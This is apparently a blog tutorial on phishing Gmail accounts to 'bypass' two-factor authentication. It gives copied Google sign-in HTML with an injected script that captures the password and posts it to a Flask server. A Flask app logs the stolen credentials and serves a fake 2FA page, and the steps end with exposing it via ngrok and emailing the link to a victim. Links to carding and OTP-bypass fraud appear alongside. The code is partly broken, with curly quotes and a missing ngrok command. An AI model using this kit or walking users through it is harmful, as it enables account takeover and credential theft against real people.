how to bypass 2fa

HOW TO BYPASS GMAIL 2FA(TWO FACTOR AUTHENTICATION) 

Initially we should know about some basics of phishing attack, It is the base techinque we use here to gain password of victim

REQUIREMENTS

1)KALI LINUX

2)SUBLIME TEXT EDITOR

3)NGROK

STEP 1:

Initially use your browser and search for google sign in

Read: How to shop online without OTP

STEP 2:

Type the mail id you wanna hack, after entering the mail id and click next

STEP 3:

After entering the mail id and right click the mouse and click inspect 

STEP 4:

after clicking inspect element ,go to inspector tab or element tab and right click and click the option called EDIT AS HTML,copy all html codes.

STEP 5:

paste it on sublime text editor and add some script at the end of the html tag

ill drop the code here:

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
<script>
    $('button').click(function(e){
      e.preventDefault()
      auth=$('input[type=password]').val()
      $.post(
        "http://localhost:5000/auth",
        {"password":auth},
        function(data, status){
          window.location="http://localhost:5000/login"
        }
        );
      return false;
        })
</script>
</html>

save this file as login.html

NOTE: 

do it same for 2 factor authentication page 

STEP 6:

next we need to write a python code that fetch deets from victim. And save it as app.py

ill give the code below

app.py

#!/usr/bin/env python3

from flask import Flask, render_template, send_file, make_response, request

app = Flask(__name__)

@app.route(“/auth”, methods=[“POST”])

def auth():

    print(request.form.to_dict())

    return “ok”

@app.route(“/”)

def index():

    response = make_response(send_file(“templates/login.html”))

    response.headers.add(“Access-Control-Allow-Origin”, “*”)

    return response

@app.route(“/login”)

def login():

    return send_file(“templates/2fa.html”)

if __name__ == “__main__”:

    app.run()

STEP 7:

open terminal in linux and type as i did and configure the ngrok

ngrok command

STEP 8:

And send the link in  mail to victim, BOOM…….!!!! youve got a password


Read: Apple Pay carding method. Updated versio

Leave a Comment

Your email address will not be published. Required fields are marked *

Shopping Cart
Scroll to Top